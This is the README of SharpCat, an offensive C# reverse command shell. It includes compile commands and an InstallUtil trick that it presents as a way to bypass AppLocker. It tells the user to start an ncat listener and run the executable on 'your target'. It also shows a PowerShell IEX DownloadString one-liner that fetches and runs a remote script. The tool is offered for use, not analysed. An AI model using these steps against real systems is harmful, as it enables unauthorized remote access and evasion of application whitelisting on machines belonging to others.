Awesome

  _________.__                        _________         __   
 /   _____/|  |__ _____ _____________ \_   ___ \_____ _/  |_ 
 \_____  \ |  |  \\__  \\_  __ \____ \/    \  \/\__  \\   __\
 /        \|   Y  \/ __ \|  | \/  |_> >     \____/ __ \|  |  
/_______  /|___|  (____  /__|  |   __/ \______  (____  /__|  
        \/      \/     \/      |__|           \/     \/      
                                                        v0.1

A Simple Reversed Command Shell which can be started using InstallUtil (Bypassing AppLocker) - by Cn33liz 2016

Compile:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /out:"C:\Utils\SharpCat.exe" /platform:anycpu "C:\Utils\SharpCat.cs"

To Bypass Applocker:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Utils\SharpCat.exe

How to use it:

• Setup a remote TCP Listener (for example ncat -lvp 443) https://nmap.org/ncat/

• Change IP/Port as needed, then Compile and run the SharpCat Executable on your target (or use the above InstallUtil trick).

Within the Remote Command Shell you can run PowerShell commands as follow:

C:\>PowerShell "Get-Help Invoke-*"

Or

C:\>PowerShell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/trollsploit/Get-RickAstley.ps1'); Get-RickAstley" 

Todo

• Build more NetCat like functions within the code (File Transfers, Bind Shell, UDP Transport).